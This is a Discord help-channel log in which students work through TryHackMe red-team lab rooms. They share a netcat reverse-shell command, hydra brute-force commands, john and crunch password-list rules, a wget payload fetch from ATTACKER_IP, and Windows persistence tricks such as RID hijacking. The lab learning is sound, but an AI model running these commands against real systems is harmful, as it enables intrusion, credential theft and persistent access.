#red-teaming-path
$ runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443"
Enter the password for ZA.TRYHACKME.COM\t1_leonard.summers:
Attempting to start c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443 as user "ZA.TRYHACKME.COM\t1_leonard.summers" ...
Ah, ok. I also tried this and it did not work for me because I also added /login-get as you can see in my screenshot. I fixed it now and it is working, but with :F it is running but not finding the password
Another thing that I observed is that I need to write index.php:username instead of index.php?username as it was in the original request
yeah that has to do with hydra syntax
Ok, I understand, thanks!
Gave +1 Rep to @royal void
Currently working on Password Attacks: Task 8. I'm trying to brute force the GET form and I'm stuck with no results. I'm worried I'm not generating the correct password list. These are the rules I'm using for john, applying both to clinic.lst and combining them:
Az"[0-9]" ^[!@#$]
[List.Rules:THM-Custom]
Az"[0-9][0-9]" ^[!@]
Which question?
Sorry, http-get-form logging in with phillips user
You have to use just the simple clinic list for that one
Ahhh that worked. Wooow that was troubling me for some time, thank you!
Gave +1 Rep to @calm gyro
You are welcome!
no problem and nice that abdy is starting to get it too to be able to help others
Just got a Tshirt, thanks thm
How should i go about completing the tasks in Task 6 of "Intro to C2"?
I've gotten into the computer, but not sure where to go from there
for the hashes in the meterpreter shell type hashdump for the 2 other flags the hints or questions tell you where to look for them... i.e they are on said accounts Desktops
Gah, was hoping I could skip going through that. I'm impatient since the rewards are limited, heh
thanks!
Gave +1 Rep to @royal void
no problem... also +rep @weak ice
Gave +1 Rep to @frosty creek
damn it
did not think the bot would do that
and i thought that would work
now shadow has to wait 5 mins to give lassi the thingy
ooh, it has a cooldown
limits you to give 1 rep point per 5 mins yeah
yeah shadow aims to learn as much as possible from the rooms
hence maybe shadow is doing this a lot slower than others
though the already completed rooms shadow had that they could speedrun through for tickets was an option at the start
Oh no, don't misunderstand. I do read the content and all. I was just hoping it would be more intuitive, as I've been able to do most of it just from individual research and previous knowledge. But I haven't gotten to the metasploit room yet of basic pentesting, so I'm lacking there
how tf do i access the machine in red team enumeration
Doing the last question of password attacks task 8 which is burgess login at /login-post. Is the john single-extra rule really supposed to generate a wordlist of 500k from clinic.lst? That's a honker of a list D:
You should indeed have a big list but 500k seems a lot, then again I don't remember exactly because I wrote the output to a file
there are green start machine buttons in 2 of the tasks.... to access them you hit that button and either start the attackbox from the blue start attackbox button to do it from the website... another alternative is having your own kali linux vm and connecting to the tryhackme vpn on it to access the target machines.... the vpn file can be downloaded from https://tryhackme.com/access as shadow said in #general
Pope says good evening to Shadow!
Can someone help me with the last one?
good evening to you too pope
try with the :S=logout.php there too.... never got it working checking for the failure
I tried this also
hmm weird then
The list of passwords was generated with this command: `john --wordlist=list.txt --rules=Single-Extra --stdout | tee final2.txt`
Where list.txt is the first clinic.list
How long did you let it run, @calm gyro ? I remember having to wait a little bit
3-5 mins I think
that's too long
537026
okay then it probably matches shadow's list
So, the same length as shadow?
Yes
for those wondering it is wordcount with the lines param
I have the same wordlist it looks and I'm just waiting for hydra to push through
but why does it take so long?
are you running this in the attackbox or on a Kali machine?
oh jeez it worked! the first run I tried using sort pass.lst | uniq -u which I think is why it didn't work
worked for shadow.... got the answer from abdy's ip.... just tested to see if it worked for shadow
yes technically shadow should have asked if they were allowed to test it from their machine too
+rep @weak ice
Gave +1 Rep to @weak ice
Yeah it worked for me as well. hydra completed in just under 2 minutes
there :)
np
Got it now, I think I just didn't wait enough. I tried more commands because I was still finding issues that I missed
YAY
Yep, I was simply just not patient enough as well.
at maximum the password attacks against thm machines are supposed to take around 5 mins
according to the former thm staff member robertabt
also for task 9 shadow recommends creating a password list and user list to use with hydra at the same time to speed up the process
think it only showed you to do it 1 password at a time ¯\_(ツ)_/¯
Hey can someone help me with task 4 in the password attacks room? In the last question i entered the exact command they want from me and it even matches the hint yet its still not the right answer. The command I entered: crunch 5 5 -t "THM@!" -o tryhackme.txt
i was solving this room (https://tryhackme.com/room/phishingyl). but when i start the machine from task 5, after the login i can't do anything (for example i couldn't create a new landing page)
can anyone help me
lol another one fails at that one
I was thinking the same Shadow
Oh so im not the only one?
try using the vpn to connect to the ip for better luck
nope it has been asked a couple times already
yeah the correct command is different to what you think the answer is currently
like I said, there is a special character for symbols
i fell for that one too
i am already connected vpn
read through the documentation again
okay did you wait 5 mins after the machine gave you the ip to make sure gophish had time to load
so should i just skip it?
no obviously you should do what pope recommended... read the documentation and try and correct the command
ok thanks
i will, thanks
Gave +1 Rep to @royal void
the command is like almost perfect, it is just a tiny detail
@ - lower case alpha characters
, - upper case alpha characters
% - numeric characters
^ - special characters including space
is the relevant part of the documentation for you @crude burrow
yes indeed
great job deadlinkj
thanks!
no problem
Anyone know why clicking on the 'new profile' doesn't do anything ?
Tried google chrome and firefox but no response
That worked, Thank you!
Gave +1 Rep to @spiral forge
hi people, getting trouble installing armitage... any help?
and problem msfdb init.... asking for doing a variable PGPORT for postgres...
can you login metasploit? might have to setup the rpc server through metasploit and use the credentials setup on armitage
https://docs.rapid7.com/metasploit/rpc-api/ should help. I haven't seen that issue; mine was getting the rpc connection to work properly. It would complain that the connection was being refused but then it would work, but the nmap_db commands wouldn't work till I set up the rpc myself. You doing a fresh install? Without ever launching metasploit?
I had trouble with it too, just used Metasploit
worked without problem for shadow from the attackbox
ya i definitely feel more comfortable with metasploit, never could get the shell_to_metasploit module to actually upgrade my shell to a metasploit session on the intro to c2 room (i think that was the one that walked you through armitage)
started use it... thanks..
Gave +1 Rep to @obtuse bone
basically on the attackbox you skip some of the setup steps and just run Armitage that is preinstalled
yeah that would be nice too..
you skip to the starting and connecting to Armitage in the setting up Armitage section for the attackbox
and then it just works
i am stuck on the question of password attack
task and question???
it says to use hydra but hydra has a problem with http-get
armitage?
task 8 question 3
it is http-get-form
screenshot of that please???
and i should update it but kali linux says that the latest version is 8.x when it is 9.2
yeah
so does it just stop scrolling after the saturday thingy and never moves further down??
yes
because tasks are actually threads
explain please
eugh
probably better for you just download the newest kali iso and install that in a new vm and try from there
as then you probably will get a newer hydra version
https://tryhackme.com/room/windowslocalpersistence Task 2, last question RID Hijacking, I can't login with the user and password provided. thmuser1 and thmuser2 went fine. Changed the RID to Administrator, was careful to replace the hex number and not to add it (happened to me before). Anyone managed to log in? I was trying with rdp, evil-winrm. All i did was change the RID like described in the description. Did I miss something ?
well 8.x is very old as even ubuntu 20.04 has the hydra 9.0 in their repos as the default
so yeah probably need an update
i use a personal kali vm and use openvpn myself
you could try sudo apt update && sudo apt upgrade on the attackbox maybe? I'm not sure, I've only used the attackbox a few times
already tried
also even weirder that you are getting that error on a thingy that only affects 9.1 according to the bug report you linked to
replace F=Login failed with s=logout.php
tried, same error
or do not use both the failure and success param at the same time
or as shadow stated get the 2022.1 kali build
so i should use personal vm right?
if you not wanna use the attackbox
the attackbox is made to work with basically all tryhackme rooms so you are fine with it
if you feel like it is not laggy or too slow
wait I think I see your problem
"/login-get get/index.php" should be "/login-get/index.php"
good spotting right there +rep
Gave +1 Rep to @frank scarab
good catch, having the success and failure pattern probably won't help either
still if you are running hydra versions as far as 1 major version behind maybe it is still time to update
I have "/login-get/index.php?:[the rest of the command]" in my notes, maybe the ? is necessary too?
nope it is not
ok good to know
hydra -l phillips -P clinic.lst 10.10.48.200 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
how long has that been running? the attackbox might be slow, could take a minute to run through each of the attempts
and there are 2 s=logout.php. Also you can use -f in case it finds the password before the 16 tries, if that's a problem
yeah that's exactly what I have in my notes from when I ran through it
well a different ip of course, but otherwise the same
new IP ?
target IP
nice! what fixed it?
this
i was missing something i guess
awesome
+rep
Gave +1 Rep to @royal void
ah yeah for the rep points you need to reply or ping the user you giving rep to
glad that fixed it for you then
thank you a lot
@frank scarab ⬆️
this way you will have a level role and can post screenshots too
oh I was just about to ask you about that, thanks! +rep
also only 1 rep point giveaway per user per 5 mins
It looks like it gave you rep the first time I replied so maybe I can't do it twice so quickly but thank you regardless
yuup exactly
I feel so official now haha, thanks!
well now you can enjoy the fun too
I'm one ticket away from that 1 month voucher and a pineapple and shirt myself
the pineapples are gone unfortunately, I'm one away from that too. I'm one away from the usb rubber ducky but I haven't checked to see if those are gone yet
awwww, didn't really check if they had a status page on what was in stock lol
yeah it's on the page that announced the red team path and the giveaways, the one that has all the ways to get tickets
I think there were two pineapples and they went pretty quick, must be some fast people out there lol
https://tryhackme.com/resources/blog/red-team-month should have seen that coming though as it would have gotten pretty pricey if there was a lot up for grabs hehe
Now I know to be ready ahead of time for advent of cyber this year!
found the page you were talking about
Oh duh I should've just linked it, here it is in case anyone else is looking for it as well https://tryhackme.com/room/tickets3
Still one more OSEP voucher and 5 rubber duckies left!
This really annoyed me. It wanted a 5 character answer, but had to use 6 chars! What?
you mean 7??? just because of those double quotes
It didn't require the double quotes to log as a correct answer, just an extra exclamation point
oh then you got the right answer through answer tolerances
try and reload the page and check the answer again to see the correct one
I see it now, thanks
Gave +1 Rep to @royal void
pretty sure you don't need the ! though, I got it with `THM^^`
oh nvm, didn't see your response that you already saw that
can somebody tell me the password of password attacks task 9? i've tried all combinations of season year and special character but it still doesn't work
i'm also running one with uppercase first letter now
the user must be guess bc it's the last one it remains
are your special characters at the end or beginning of the word?
hmmyeah I had it at the end too
one sec let me check my notes
what command are you using?
to create your list
oh yes sorry it's also Az"19[0-9][0-9][!@#$]"
and Az"20[0-9][0-9][!@#$]"
the words are
Summer Winter Autumn Spring
and
summer winter autumn spring
should i try other special characters?
I don't remember the password but I would add "Fall" to that seasons list, and I had my rules set up slightly different
`Az"[2][0][0-9][0-9]" $[!@#$]`
My seasons list has Summer Winter Fall Spring
ok i'll try fall
I don't think that was in the password, but I only wrote down the flag in my notes not the password so I don't remember for sure lol
but the expression you're using for the rules might not be parsing correctly, I think you need brackets to show how many characters there are
so you might only be generating 3 digit years if I'm reading it right
I could be wrong, regex isn't my strong suit and I'm not sure how johntheripper reads it exactly
right
let me check my bash history, i should have it in there
I just did that room this morning
Oh I see it, yeah add Fall to your list lol
I MEAN
```
[List.Rules:THM-Spray]
Az"202[1-2]" $[!@#$%^&*()]
```
I used this rule against a list of:
winter
summer
fall
spring
Winter
Summer
Fall
Spring
FOR A NON ENGLISH SPEAKER
I didn't even know fall existed as a word
i'm crying i wasted one hour
oh no
wow that must have taken a lot
Yeah I can see how that would send you down a rabbit hole for sure! I'm surprised they didn't use any of the other seasons that are better known haha
I didn't even think about Autumn until you mentioned it, so if it was that I would've been in the same position as you wondering what I was doing wrong for hours
(although they do mention fall in the examples now that I'm looking it over again)
anyone able to help with windows local persistence, flag 13? it involves adding UserInitMprLogonScript to HKCU\Environment with your revshell as the data. I don't see any evidence that UserInitMprLogonScript is being executed at all after logging out and back in, even with simple test scripts.
I found the answer in the #999008613102260275 room
and it's for sure using 2020/2021 in there too?
no it functioned but it continued going and the limit of scrolling was 516
i did it again and it worked
THANK YOU BRO
Awesome I'm glad you got it !!
I also had issues with getting this to work. After trying unsuccessfully multiple times, I reset the box and used RDP to get it eventually
I didn't need to reset the box for this but what worked for me was adding the value in Computer\HKEY_USERS\[Administrator SID]\Environment instead of Computer\HKCU\Environment
Nice, thanks for sharing, that sounds familiar. I did that lab a few days ago so it's not fresh
Gave +1 Rep to @patent pawn
guys anyone had issues loading gophish site ?
I had to switch browser, Chromium worked, Firefox didn't. I was using my own Kali VM
Go to https://[MACHINE-IP]:443/ instead of the link provided, accept the certificate, and then it should load. I also had this problem.
this worked , Thank you
Gave +1 Rep to @patent pawn
Well... should've done a better search before posting but for those who might encounter this issue I just followed @patent pawn recommendation and it worked like a charm... thanks @patent pawn!
Gave +1 Rep to @patent pawn
Hey all, when getting 3 streak freeze tickets, do I have to redeem them straight away? Do they disappear after the 21st of September and how do the streak freezes work? Do they only apply for the next 7 days or does it last forever and stop my streak from restarting on any random 7 days?
What am I doing wrong here?
thanks man
Gave +1 Rep to @patent pawn
THM should be "hard coded"
it said containing THM@! so at least THM should be in there
that is what I was doing initially but couldn't figure out the two remaining characters, then i thought it wanted the command for a list that would happen to have THM@! in it idk
Remove the -o and have the output print to the console, see what it looks like
it will help you out
@zealous wind this is the hint btw
yes, the "options" should contain the phrase to generate the right output
how about u put "THM" and don't make the 2 special characters too specific
maybe with `^^` instead
@zealous wind I have generated a wordlist with the required text tho? confused af
yea but it's not the intended answer
look at this
the hint says 5 5, is that meant to be exact or like an example
@late marsh the answer should also be quoted otherwise you have spaces and thats not what you want
5 5 means that 5 min and 5 max length
@main oyster I know that, was wondering if the 'hint' showed the exact or an example
exact
only the options that u have to figure out
so it doesnt want a list that happens to contain THM@!
.
damn it lmao
this also stated that ^^ is for symbols
the answer format '*" literally had two extra asterisks
which is just rude
i did ,,,^^ which is just a loooooooong version of THM^^
thanks lmao
Alright I'm in the room active directory basics,
Where I'm supposed to reset Sophie's password, and set it for her to change her password on log on,
So Now I logged in as sophie and trying to set the new password but it's keeps saying password doesn't match , I'm 100% sure my passwords match
how can i take or put aallll --stdout from hydra list rules and put it in a file?
Output redirect doesn't work? --stdout > file.txt
nope.. ive tried already
oh... i tried without stdout and work
try with just the redirect > and not the flag?
that way the tool output will just be written to the file
you can do some clever stuff like > file.txt & tail -f file.txt if you want to monitor its progress & read it as it happens
the output worked... but what am i doing wrong in this syntax? because the pass doesn't work...
already tried http-post-form and didnt work either...
c?
yeah maybe typo in the pass? best way to check is copy & paste rather than typing - though you might have already done this
nope... caps are not the problem
your syntax is wrong
check the condition
and change the the HTTP method (if you are at the step of the challenge)
and make sure you are using the right list with the right rule
oh yeah the list is ok
maybe is the condition
can someone tell me what i'm doing wrong
and the first one?
what first one
this condition would be the right?
you show only the second pass..
i showed the two
check the beginning
right sorry
gave me a pass but doesnt work
your syntax is wrong
condition is right, but look again
you are missing something
sh****t
missing? there is more syntax?
no, its just wrong
still trying...
look at how the success condition should look like
that's my problem, if it isn't like the previous task, i don't know how it should look...
the previous was logout.php, but it was like this on thm...
the success condition does not change between tasks
Sweet!
Basic maths i was dumb
hey...
room thelayoftheland task 9 dns question...
I am trying to perform AXFR query but I get Query refused because of security settings..
what am I doing wrong?
no
should i create a list with season+year+special char?
not big list
What's the full command you are using ?
just 2020 and 2021
where u get that pass?
and if u are dealing with symbols use ' ' around the pass
I tried inside nslookup
ls -d thmredteam.com
also inside nslookup
set type=AXFR
thmredteam.com
well.. i thought may be the same on the task
And you are running that on the attached target machine, not on your own ?
yes
I can't send pics but yes I am in the windows machine
Have you also provided the IP of the dns server with server machine_IP ?
You have to verify first in order to be able to send screenshots in here
!docs verify
thanks it worked.. I forgot to specify server...
Gave +1 Rep to @native berry
thanks I will...
what is wrong here?
what room?
password spray last task
Hm you only have passwords with ! As symbol?
I don't recall the symbol by heart but I think you can try others
got it with /@
And still no success?
I think he meant "got it" as in succeeded
Aah ok
man is this hanging for anyone else?
just used `snmpwalk -v2c -c public <Machine ip>` and it worked
why you only used ! the room didn't specify this character
it's 1 char but it's not supposed to be !
yay... already made it with @
ok
doing phishing now
Hi there, I'm stuck at SandBox Evasion Challenge. I can either pass the sleep check or the memory, network and geofilter checks but not both. Do you have any idea where the problem might be?
anyone has any idea why i cant post pictures in the channel?
when i drag and drop an image in other channels it works but here nothing happens
weird
You have to verify first
!docs verify
thx
Gave +1 Rep to @native berry
Windows Local Persistence - Task 2: can anyone point out what I'm missing here? I'm opening a text file but get no shell, the script works though. tried with quotes and without
in the phishing room, does the gophish page work for you? it refused to load for me
Windows Local Persistence (https://tryhackme.com/room/windowslocalpersistence) Task 2, flag 3, RID Hijacking. I can't login with thmuser3 and evil-winrm (or rdp). users 1 and 2 went fine. Changed the hex value to 500. Did I miss something ?
That's the attempt to login and the error message I get. After changing the RID with regedit. I've tried some techniques from the other users too, like assigning it to groups or privileges for Backup Operators. Changed the password for thmuser3 too. No login
Ok, it worked now. I was using remmina and I've edited an existing connection I had. After I've added a new connection and didn't use an existing but edited connection, it worked. I'll have to redo the whole room to see if that really was why it didn't work
You sure that's task 2. Since I was doing Task 2 now and I don't remember that.
No problems with the phishing room on my side. Try to restart the machine
This worked for me. No quotes, Does the backdoor script work ? When you execute it on the command line ?
And check with dir if the backdoor script has the right extension. ps1 not ps1.txt like windows likes to add an extension by itself
Why doesn't the ssh session have the user token? do I always need to use runas? I mean I already entered the credentials in the SSH login, and whoami shows the exact same user, I'm a bit confused here
nevermind they wanted me to use a different user's credentials
Although im getting an access denied error:
How I created the shell:
task 3 my bad
yes, the script works
strange, this one worked for me without problems, maybe a machine restart will resolve it
yeah, trying
if it's only about the flag and if it works on the command line, you can get the flag and revisit the task later
when i run the script manually and get a shell i get an error when executing flag6.exe
Sorry! You are still missing something. No flag for you yet. (6)
and i cant get the damn thing to run via registry
It definitely works. Double check the backdoor PS1 file, the extension , the registry entry. I didn't do anything different than how it's described on the page
seems legit to me too
Hey @zealous wind
Are you sure about the registry path
You are probably editing the textfile not txtfile
Can you verify the registry path real quick
Geez!!!! you are right!
Thought so.....
Keep it up
hahaha sometimes the fatigue kicks in after a working day, I was trying to find why it was not working, in the end I forgot to start the VPN
hm is it because all prizes are claimed it is so calm here?
I too man, did you answer already ?
ok fine i found it lol
What did you do to finally get it to work? I feel like I am following the instructions but no luck.
Yeah was digging around but wasn't sure if there might actually be something wrong or if it was just people blaming the task.
Anyone have issues on Password Attacks room, task 8, last question? Got every other one of them done but can't seem to make headway in it
picture
20 times doing this... the machine never does the task
go to sleep.... let me know if anybody has the same problem or if in this room the machine isn't working well...
Gm fam
is there an issue on windows privesc under red team path? can't connect to the machine via rdp
Im using my kali to connect, then xfreerdp
hii can anyone help me
room name red team
Evading Logging and Monitoring
task 10
Enter the flag obtained from the desktop after executing the binary.
i tried many times to solve this problem
please anyone help me
Hello, any solution for the gophish website? Is loading and I can not access the features
For me was working just via the Attack Machine from the site
How did you access the gophish website?
the public one seems to be having issues from time to time
I tried from my Kali machine on Firefox and Chronium and didn't work. From the Kali Attack Machine on THM was working fine
but what IP address did you use to access the goPhish site
because I also used a Kali machine and it worked just fine by accessing it via the localhost
This one: https://MACHINE_IP.p.thmlabs.com:8443
Did you uh, start the machine?
Yes, yes. I just mask the ip of the machine before sending here
Why?
hmm
I know there is no risk, but I do it out of habit
I can share with you if you want to test it
btw
I believe if you are connected over vpn you can remove the thmlabs.com in the link
only machine_ip:8443
Nope, it is not working for me
So the website is reachable, but it is not loading. Like this:
:/
But it is ok, I already wrote here that I was able to do the tasks using the Attack Machine from the website
I still would like to understand why it is not working
because it worked fine for me
Why is the file missing?
In Task 4 of Network Security Solutions it asks how you would go about setting up a ncat session to listen on the Telnet port... not sure what I'm missing on my answer. How did you think through that question?
We don't see your answer, so that's difficult to help
nvm... I got it... I kept using the UDP option for no good reason
Can you try searching for a .exe ?
Hi guys!! I'm doing the "passwordattacks" room and I'm having problems with the question "Perform a brute-forcing attack against the phillips account for the login page at http://10.10.188.218/login-get using hydra? What is the flag?"
I'm trying to brute force the user with the custom wordlist made with words of https://clinic.thmredteam.com/ in raw and it doesn't work. Do I need to use a rule-based attack?
can you show us the command you are using?
Of course!
hydra -l phillips -P clinic.lst 10.10.188.218 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed!" -f
105
./cewl.rb -m 8 -w clinic.lst https://clinic.thmredteam.com/
The rule-based attack in the SMTP question with the same wordlist worked
I'm going to try to restart the VM...
If not, I cant try from the attackbox, I had some problems these days from my laptop for some reason
the only thing is, I have just used cewl rather than cewl.rb
Thanks
Gave +1 Rep to @celest vessel
I could check what my clinic.lst contains
protected
Research
Oxytocin
Paracetamol
Cortisol
appointment
Cardiology
February
providing
treatment
commonly
hospital
Template
tooplate
Pregnancy
Saturday
Copyright
Laboratory
Departments
Insurance
healthier
Exercise
customised
Lifestyle
Balanced
nutrition
Benefits
clinical
innovative
technology
experience
multidisciplinary
surgeons
researchers
specialists
together
medicine
pressing
findings
medicines
treatments
President
Weronika
Phillips
released
reaction
connections
stressful
situations
reliever
alleviate
referred
response
APPOINTMENT
Department
Additional
location
affiliated
professionals
establishing
maintaining
qualified
physicians
committed
tailored
specific
requirements
official
Medicalmedical
porttitor
imperdiet
vestibulum
molestie
Phasellus
vulputate
Vestibulum
vehicula
placerat
venenatis
eleifend
Technology
Consultant
thmredteam
Professional
interdum
condimentum
pellentesque
fringilla
volutpat
tincidunt
Maecenas
lobortis
facilisis
pulvinar
dignissim
Suspendisse
Facebook
maecenas
voluptate
Introducing
Categories
pharetra
Curabitur
consequat
ultricies
Could be a case-sensitive problem?
wait
I do see a typo
You use F=Login-failed
what if you try S=Login-failed ?
@marsh birch ?
That means it will stop when the text is found, doesn't it?
it means it should show you the valid credentials in case of success
It doesn't work. It stops at the beginning of the wordlist and the password isn't correct
Because found the text "Login Failed"
hydra -l phillips -P clinic.lst 10.10.173.10 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=Login failed!" -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-14 15:58:45
[DATA] max 16 tasks per 1 server, overall 16 tasks, 105 login tries (l:1/p:105), ~7 tries per task
[DATA] attacking http-get-form://10.10.173.10:80/login-get/index.php:username=^USER^&password=^PASS^:S=Login failed!
[80][http-get-form] host: 10.10.173.10 login: phillips password: protected
"protected" is the first entry of the wordlist
And isn't the password for phillips
yesh!
But how could I know this is going to be the redirected page if I don't have valid credentials to test it?
I mean, I don't have the information of how is the webpage when a user is logged, so how could I solve this question without this information?
well this is a practice environment
in reality you would have to enumerate such information
Ok thanks!!
no problem
Sorry for asking again, I'm having problems doing this room. How can I guess the password in the "Password spray attack" part?
I tried with the one in the example but it doesn't work, and the hint is too much to guess. I need to create a wordlist with this wildcard?
and there is a hint with what the password could be
so the exercise is challenging you to reuse the tools you have learned
Ok, I didn't know I needed to create a password list too. Thanks!
My wordlist has near 8000 entries and I used years from 2010 and this special characters: !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ The task is taking too much time, any suggestion?
Are you on THMIIS? Maybe you are trying to get the flag from THMJMP2?
@celest vessel
I've reduced the special characters to !@
But it doesn't find the password
What is the first access type mentioned in the document?
Any ideas?
Without providing what room and what task you are talking about it's hard to help
Then you have an issue
Never mind I download not the right file lol
Rules of engagement
Red team engagement
Aaah wait
Did you use capital letters?
Nop................
Hehehe
OMG hahaha I'm gonna try it
It took me quite a while to find out
It's true that in the examples they start in caps
It should take less than a minute to hit the answer
Haha good for you
All prizes redeemed already, much faster than the 21st. Super cool, still the path is awesome even though the tickets are out of the game
same problem here but is there a john the ripper rule to, like, add all of this to years?
oh for the password spraying online attack??? in the password attacks room???
yup that is the one
you can use hydra to use 2 lists.... if you want shadow's password list for said task here you go:
manually.....
Yeah, with a python script in my side
i was trying so hard to avoid it
Bad luck
eh it was quick to do with copying and pasting and sublime text regex stuff and replace
Sublime hacks hahaha
Gave +1 Rep to @royal void
no problem
You need to verify
Wait, there are no prizes anymore?
I really think that this task is not as it should be. Because the idea of a spraying attack is not to focus on a list of passwords but to focus on one common password. Even if the hint is season + year + symbol, the password should be simple, but instead of that I remember I was trying a lot to find the right password and I was put in the situation of making again a rule list with a lot of passwords. In this case the practical part is not focused on a spraying attack anymore...
I don't really follow you, I do see this task as a password spray. You are spraying "a password" against all the users. Since the password is not the right one you go on to the next password spray and so on until you get a hit. I believe sometimes the explanation in the exercises is not always as it should be. This last task was a combination of multiple aspects, I found it very interesting, except for the part when I realized there are also capital letters
The problem is when you try to use this method, changing the password until you reach 20 attempts. I don't believe that the task was not good, but just not good for the specific example. Idk, it's just my opinion
Maybe not, but if it had worked with a given password the task would maybe have been a bit light
I don't know, like I said, sometimes the questions are a bit weird
why does it keep hanging here
I was having issues with armitage which is why I'm using meterpreter
armitage said this initially
and then armitage never worked
i mean i can launch it
How long is it hanging there? Or how long are you waiting?
I've left it like this for 10 minutes
my issue with the teamserver is this and when I try doing it again it just says "it's currently running, try to kill"
Might be some connection issue.
If you check ip a s do you only see tun0 or any extra like tun1, tun2 etc.?
If your attacking machine is a VM, do you have any personal VPN running on the machine that is hosting your Kali?
Ah that reminds me
you're right, I forgot I had a VPN running on my personal machine
I had it on for 2 seconds and forgot about it
k
Not sure if necessary, but why not
so I accidentally closed the tab and ran the script again
so now I have two tun interfaces
with both the same VPN IP
how do I get rid of one
sudo killall openvpn
ah
And connect again after that
hm still seems to hang
Give it 2 - 3 mins
okay
If nothing changes, you could also try sudo ip link set dev tun0 mtu 1200
Hey friends, how y'all doing? I need help with Windows Persistence Task 4, abusing services. After trying to create a service and while trying to execute it I get this error: "the service didn't respond to the start or control request in a timely fashion". What am I doing wrong? And do you all have to start the room all over again just because you are not able to finish it, and you won't be able to retrieve the next flag because you didn't retrieve the last one? Just asking because I had to start this over and over again because I can't finish it all at once
I'm kind of confused about Task 6 of the Password Attacks room... anyone else in the same boat? The question asks for "S[Word]NN where S is a special symbol (!@) and N is a number [0-9]... what is that rogue " at the beginning?
apparently a typo
Again, how are you guys able to get the payload onto Windows after generating it using msfvenom? wget won't work for me, nor Invoke-WebRequest
Got it. Thanks @royal void ... that was kind of dumb
Gave +1 Rep to @royal void
I'm having some issues with cewl and the Nokogirl package when trying to generate the list. Has anyone found this problem and a solution to it?
Nokogirl package ? What would you need that for in the password attacks room ?
cewl is complaining about an uninitialized constant on my end for the Nokogiri:classresolver... I guess an update of that package on my end is not working well or something. I might look into removing it if that is all that can be done.
nokogiri
Oh, that's part of cewl ?
Yeah, didn't even know about that, thought you installed something extra besides cewl
well, I removed it and it removed cewl with it but upon execution it requested to install cewl again and that resolved the problem
yes, it seems it is part of the internals of cewl
I did a: sudo apt-get remove ruby-nokogiri and then got 'cewl' command not found after that, but it prompted me to install the application again... so we are all good here
wget should work. If it doesn't, you can always use impacket's smbserver.py script to make a share on your linux box that can be accessed from the Windows host. You can also just use RDP to connect to the machine and drag and drop it
roughly speaking... how long did the http-post-form and the password spray attacks take for you? I was running the first and sort of gave up because it was taking forever... and the ssh attack is also taking a good while
k... got SSH
https://tryhackme.com/room/dataxexfilt# currently trying to get an http tunnel set up for task 6 but despite doing what the instructions say all I get is "Empty reply from server", this is both using Kali through a VM and the attackbox
someone having problems with this.. task 2 Win Local Persistence...
never make system.bak
I had issues with that, I waited an hour and nothing, but cancelled and reissued the command and it worked for me
the problem is system.bak, sam.bak does it instantly
I already cancelled and tried 20 times
yeah not sure what was going on, had to reissue the command to get it to work, it hung the first time
system.bak is a lot larger hence it takes more time
wait more than 1 hour???
obviously not that long
yeah don't know what was happening for me but it was much quicker when I cancelled and reissued the command
I've already cancelled it many times
and resolved my issue in the other room, the page gives you the wrong IP
so frustrating, can't go on because of it
well we could cheat a bit if you are okay with that
shadow has the hashes stored so that you could use them to jump to the login with evil-winrm and the hash
well... in this instance I'm ok with cheating
so is it okay if shadow DMs the hashes then???
yeah
and sent
and a quick note for a future room you're likely to encounter: on the http tunnel bit in the data exfiltration room the room says to set the tunnel to http://172.20.0.121:80 when it's actually http://172.20.0.120:80
shadow had another problem after making said files as they did not want to download to shadows machine so shadow had to download them to the attackbox
did you report that in #room-bugs so they could fix the typo???
thank you for informing i neglected that
thanks both, will take notes of that
and sent a message too the channel
Thanks, and how about this too, any hint please? Hey friends, how y'all doing? I need help with Windows Persistence Task 4, abusing services. After trying to create a service and while trying to execute it I get this error: "the service didn't respond to the start or control request in a timely fashion". What am I doing wrong? And do you all have to start the room all over again just because you are not able to finish it, and you won't be able to retrieve the next flag because you didn't retrieve the last one? Just asking because I had to start this over and over again because I can't finish it all at once
Gave +1 Rep to @echo ore
can you show a screenshot of the command you used to generate the service executable and what you are running to start it???
Same syntax provided for us in the question, I did copy and paste directly to make sure I'm doing it right, in fact
I might have to go back to the question and set up my question since I already moved to another room because I'm having difficulty with it
finally finished that persistence room. It's a lot, but I haven't had that much fun with a room in a long time. Congrats creator
including spaces after the = but not before???
A question about the next room. Pivoting https://tryhackme.com/room/lateralmovementandpivoting . It says I have 2 days of access left. Does that mean I have to finish it in 2 days and after that I can't access the room, the network, anymore, in case I want to redo it with better notes?
Yes, not before
I think that might be the issue right ?
¯\_(ツ)_/¯
is this the first flag or the second ?
On task 8 in windows local persistence, when I try to access the aspx shell I get a 401 unauthorized error
You say ?
For the first one
It won't let me start the service
That's the issue I'm having
dunno what the problem is
that went fine on my side, it took a while but it worked. check the shell or post it here
did you make them able to connect remotely???
I'm redoing it right now, let's see if I get the error
Thanks friend, would appreciate it, and let's see how you are able to get it done
Gave +1 Rep to @manic umbra
Well I have the same issue myself, try to run the flag script from an RDP login rather than evil-winrm
I had massive problems with that one. I've created a new connection, didn't reuse the edited administrator connection (in remmina)
So do I
oh wait thmuser3??? did you change the hex that you needed to change in the registry???? if yes, log in as the normal administrator account and then run the flag exe for that task
see the programs bar and the right-most icon
should that window appear after the psexec command??
that is the regedit icon so it is open
still not working..
THMService I get the same error. But this command isn't important. You already have the password. You'll get the flag with msfvenom and a reverse shell with service THMService2
Don't use winrm, use remina or xfreerdp, create a connection with the user thmuser3 and password Password321
yeah I'm trying but it isn't connecting
And how are you able to get the payload onto the system? I try to use powershell -c wget, it won't work, and even Invoke-WebRequest; and again, since the service won't start it's so hard to make the other part work, since I would have to start the service to gain a reverse shell
in powershell wget ATTACKER_IP:8000/rev-svc.exe -O c:\windows\rev-svc.exe
python3 -m http.server on the attacker machine, of course
Thanks will give this a shot again
it worked for me a minute ago
even split view is getting an error
man, that was a weird one for me too. I was planning to redo it. So why not now, maybe I can help you somehow
if I find what task that is
yes, this one was but you'll get it
2 days doing the task
task 2, win local persistence
I've already made thmuser3 able to connect remotely
